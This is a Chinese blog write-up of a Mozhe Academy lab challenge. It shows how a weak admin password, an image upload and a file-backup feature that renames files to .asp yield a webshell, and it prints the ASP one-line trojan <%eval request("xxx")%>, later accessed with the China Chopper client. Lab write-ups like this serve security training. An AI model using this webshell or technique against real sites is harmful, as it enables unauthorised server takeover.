拿webshell的方法之文件備份(墨者WebShell文件上傳漏洞分析溯源(第5題))

文件備份拿webshell(asp中很多站仍然存在的致命漏洞)
想要拿到webshell,有很多種方法,今天列舉一種方法,一時間沒找到什么好的例子,忽然在墨者學院找到了一道題,一起來看看吧。。。


題目.png

就是這道題
我們打開靶場環(huán)境

1.png

點開,進入,發(fā)現(xiàn)需要管理員才能進去,我們開始嘗試進入,

2.png

發(fā)現(xiàn)這是一句弱口令,密碼admin,輕松進入。。。。。。
進去之后我們看到了這個頁面,打開。


3.png

看到下面有個文件上傳,我們開始嘗試上傳文件
asp一句話木馬:<%eval request("xxx")%>
隨便上傳一個jpg文件(必須帶有asp木馬)之后返回一個路徑。我們復制這個路徑


4.png

之后文件備份就開始了
6.png

上面的是剛才復制的路徑,下面的是我們隨便起的名字,因為是asp的腳本,我們索性取asp后綴,點擊備份之后,看到返回一個路徑,嘿嘿 。。
然后我們訪問以下這個路徑


7.png

我這個只是什么都沒有的一句話改的后綴。你們可以上傳圖片馬,但是訪問時千萬不要有無效字符

然后我們就可以嘗試用剛才創(chuàng)造的webshell來解決這個問題了。
菜刀連接

8.png

在我們可愛的地方找到了這個結果。。。。點開后拿到我們需要的墨者key

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell實現(xiàn)與隱藏探究 一...
    JackyTsuuuy閱讀 21,213評論 2 13
  • 一、初步認識 1.上傳功能:網站上各種可以上傳文件,圖片的地方可以被用作上傳點進行非法上傳 2.上傳原理:在前端代...
    楠昭閱讀 1,813評論 1 11
  • 什么是文件上傳漏洞? 文件上傳漏洞是指由于程序員在對用戶文件上傳部分的控制不足或者處理缺陷,而導致的用戶可以越過其...
    Smi1e_閱讀 25,254評論 0 24
  • 黑客在入侵企業(yè)網站時,通常要通過各種方式獲取webshell從而獲得企業(yè)網站的控制權,然后方便進行之后的入侵行為。...
    查無此人asdasd閱讀 3,858評論 0 3
  • 文件上傳漏洞是指用戶上傳了一個可執(zhí)行的腳本文件,并通過此腳本文件獲得了執(zhí)行服務器端命令的能力。這種攻擊方式是最為直...
    付出從未后悔閱讀 1,252評論 0 4

友情鏈接更多精彩內容